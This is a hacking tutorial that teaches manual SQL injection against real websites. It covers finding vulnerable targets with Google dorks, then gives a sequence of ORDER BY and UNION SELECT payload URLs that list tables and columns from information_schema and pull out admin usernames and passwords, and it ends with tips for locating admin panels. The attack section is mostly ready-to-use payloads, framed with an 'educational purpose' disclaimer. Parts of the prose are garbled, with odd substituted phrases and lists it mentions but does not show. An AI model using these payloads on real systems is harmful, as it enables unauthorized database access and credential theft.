ALL ABOUT MANUAL SQL Injection
All Information provided in this book is only for educational purpose, if
any one will be found in an illegal activity then we have no responsibility
for this .
An Important Note Before Starting
Hacking is an Art of Intelligence; if you don’t have this Art then leave the book now
and take rest otherwise you will feel a head pain. If you are the experienced person of
this art then you will understand it very easily. Just Remember one thing there is no
special skills need to learn something new, only the mind should be positive and
always open with sharpness to understand .
Complete Guide to SQL INJECTION:
Before we see what SQL Injection is. We should know what SQL and Database are .
Database is collection of data. In a location connected to the Internet that maintains one or more web pages point of view, database is used for storing user
ids,passwords,web page details and more.
Some List of Database are:
DB servers ,
MySQL(Open source) ,
Postgre SQL(open source) ,
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are
using SQL query. We are querying the database so it is called as Query language .
Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database .
Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name .
select * from users;
Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table .
insert into users(username,userid) values("BreakTheSec","break");
I will give more detail and query in my next book about the SQL QUERY .
What is SQL Injection?
SQL injection is Common and famous method of hacking in present. Some newbie’s are thinking that
this is a small thing due to some kiddy or scripted software like “Havij�?, but if you see it manually then
it is a huge topic and many books can be easily written on this. Using this method an unauthorized
person can access the database of a website. Attacker can get all details from the Database.
What an attacker can do?
Accessing secret data
Modifying contents of website
Shutting down the My SQL server
Now let's dive into the real procedure for the SQL Injection .
Our best partner for SQL injection is Google. We can find the vulnerable websites (hackable websites)
using Google Dork list. Google dork is searching for vulnerable websites using the Google searching
tricks. There is lot of tricks to search in Google. But we are going to use "inurl:" command for finding
the vulnerable websites .
If you want to find out more then search on Google for latest SQL dorks .
How to use?
Copy one of the above command and paste in the Google search engine box.
Hit enter .
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.
if you like to hack particular website,then try this:
Now we should check the vulnerability of websites. In order to check the vulnerability, add the single
quotes (') at the end of the url and hit enter. (No space between the number and single quotes)
If the page remains in same page or showing that page not found or showing some other WebPages.
Then it is not vulnerable .
If it showing any errors which is related to sql query, then it is vulnerable. Cheers..! !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
Now we have found the a location connected to the Internet that maintains one or more web pages is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and
order by n statement)
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column " .
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
change the number until you get the error as "unknown column"
if you get the error while trying the "x"th number,then no of column is "x-1" .
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
so now x=8 , The number of column is x-1 i.e, 7 .
Sometime the above may not work. At the time add the "--" at the end of the statement .
http://www.victimsite.com/index.php?id=2 order by 1--
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the
"order by n" with this statement. And change the id value to negative(i mean id=-2,must change, but in
some a location connected to the Internet that maintains one or more web pages may work without changing) .
Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number
of columns) .
Now select 1 number .
It showing 3,7. Let's take the Number 3 .
Now replace the 3 from the query with "version()"
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
It will show the version as 5.0.1 or 4.3. Something likes this .
Replace the version() with database() and user() for finding the database, user respectively .
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working, then try this:
http://www.victimsite.com/index.php?id=-2and 1=2 union select
If the version is 5 or above. Then follow these steps. Now we have to find the table name of the
database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables
http://www.victimsite.com/index.php?id=-2 and 1=2 union select
1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where
Now it will show the list of table names. Find the table name which is related with the admin or user .
Now select the "admin " table .
If the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore
to do sql injection with version 4 .
Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM
information_schema.columns WHERE table_name=mysqlchar--
Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace
mysqlchar with that .
Find MysqlChar() for Tablename:
First of all install the HackBar addon:
This will open the small window ,enter the table name which you found. I am going to use the admin
table name .
Now you can see the CHAR(numbers separated with commas) in the Hack toolbar .
Copy and paste the code at the end of the url instead of the "mysqlchar"
http://www.victimsite.com/index.php?id=-2 and 1=2 union select
1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)--
Now it will show the list of columns .
Now replace the replace group_concat(column_name) with
Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name .
Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105,
110)" with the "from table_name"
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
Sometime it will show the column is not found .
Then try another column names
Now it will Username and Passwords .
If the a location connected to the Internet that maintains one or more web pages has members then jock-bot for you. You will have the list of usernames and password .
Some time you may have the email ids also, enjoy you got the Dock which can produce the golden
To find admin panel is a boring and time taken work, because you have to guess the admin panel like:
If you have luck, you will find the admin page .
If you want latest admin url list then search it on google, or it is more better to use admin panel script
in perl .